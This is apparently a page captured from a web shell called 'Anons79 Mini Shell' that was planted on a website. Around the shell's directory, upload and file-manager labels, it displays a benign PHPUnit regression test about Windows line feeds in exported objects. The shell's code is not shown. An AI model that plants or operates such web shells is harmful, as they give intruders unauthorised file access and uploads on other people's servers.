Anons79 Mini Shell

Directory : /home/proudlyafrican/www/vendor/phpunit/phpunit/tests/Regression/GitHub/581/
Upload File :
Current File : /home/proudlyafrican/www/vendor/phpunit/phpunit/tests/Regression/GitHub/581/Issue581Test.php

<?php
class Issue581Test extends PHPUnit_Framework_TestCase
{
    public function testExportingObjectsDoesNotBreakWindowsLineFeeds()
    {
        $this->assertEquals(
            (object) [1, 2, "Test\r\n", 4, 5, 6, 7, 8],
            (object) [1, 2, "Test\r\n", 4, 1, 6, 7, 8]
        );
    }
}

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]